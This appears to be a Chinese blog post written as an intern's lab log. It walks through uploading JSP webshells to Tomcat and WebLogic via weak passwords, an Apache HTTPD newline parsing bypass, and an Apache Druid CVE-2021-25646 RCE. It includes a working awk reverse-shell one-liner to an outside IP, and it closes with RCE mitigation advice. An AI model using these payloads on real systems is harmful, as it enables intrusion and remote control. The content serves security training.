实习作业第八天

VPS安装docker和docker-compose

TOMCAT:

漏洞成因:弱口令、未检测上传的文件安全性

首先利用弱口令进入后台

打开哥斯拉生成一个jsp木马,压缩为zip文件后改名为war后缀,上传到网站

测试连接成功

Weblogic打靶:

漏洞成因:弱口令、未检测上传的文件安全性

进入靶场

通过弱口令暴力破解进入后台weblogic:Oracle@123

将木马war包上传到网站

文件链接

/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/upload/shell.war

木马路径

http://43.132.172.73:7001/shell/shell.jsp

Apache HTTPD 换行解析漏洞

漏洞成因:在解析PHP时,a.php\x0a将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。

首先修改evil.php为info.php.

在16进制中将末尾的.更改为0a然后发送

CVE-2021-25646

漏洞成因:Apache Druid 0.20.0和更早的版本存在访问控制错误漏洞,该漏洞允许经过身份验证的用户强制Druid运行用户提供的JavaScript代码,并执行服务器进程特权的代码。

首页请求的时候发送id命令可以看见回显

uid=0(root) gid=0(root) groups=0(root)

出现远程命令执行漏洞,切换为反弹shell命令可以反弹shell

Id更改为反弹shell命令反弹成功

awk 'BEGIN {s = "/inet/tcp/0/43.132.172.73/9999"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

RCE漏洞的原理和利用条件及解决方案

后台有时候会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞不管是使用了代码执行的函数,还是使用了不安全的反序列化等等。

网站出现能让用户发送治疗并执行的地方,网站野没有对用户上传的数据做检测,导致能被远程执行

利用条件:

寻找目标:攻击者首先需要找到存在RCE漏洞的目标系统或应用。这可能通过扫描公开的网络资产、利用已知的漏洞信息、或通过社会工程手段获得访问权限。

探测漏洞:攻击者使用特定的技术或工具来探测目标系统或应用是否存在RCE漏洞。这可能涉及到发送特定的请求、构造特定的输入,观察目标系统的响应,以判断是否存在可利用的漏洞。

注入代码:一旦确认存在RCE漏洞,攻击者会尝试注入恶意代码。这可能涉及到在用户输入中夹带恶意代码、利用现有功能提交恶意请求等手段。如果目标系统未对用户输入进行适当的安全验证和处理,攻击者的恶意代码将被执行。

控制目标:一旦恶意代码被执行,攻击者通常能够获得对目标系统的完全控制权。他们可以执行任意命令、访问敏感数据、安装后门、甚至进一步控制受影响的其他系统。

防范:

输入验证:对所有用户输入进行严格的安全验证和过滤。确保应用程序只接受预期的输入,并对所有其他输入进行适当的拒绝或转义。这包括对用户提交的数据、命令和参数进行严格的验证和过滤,以防止恶意输入的注入和执行。

参数化查询:使用参数化查询或预编译的语句来执行数据库查询。这可以防止攻击者注入恶意SQL代码,确保数据库的安全性。

输出编码:对所有输出进行适当的编码和转义。这可以防止攻击者注入恶意代码或标签,确保输出的安全性。

最小权限原则:确保应用程序和服务以最小的权限运行。避免赋予不必要的权限,只授予必要的权限以完成必要的任务。这将限制潜在攻击者的破坏范围和影响。

更新和维护:保持系统和应用程序的最新状态。及时应用安全更新和补丁,以修复已知的漏洞和缺陷。此外,定期进行安全审计和渗透测试,以确保系统的安全性。

安全配置:对系统和服务进行安全配置,限制潜在的攻击面。例如,关闭不必要的端口和服务、限制网络访问等措施将降低被攻击的风险。

监控和日志记录:实施全面的监控和日志记录机制。这有助于及时检测和响应可疑的活动和异常行为,以便及时采取措施应对潜在的攻击。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值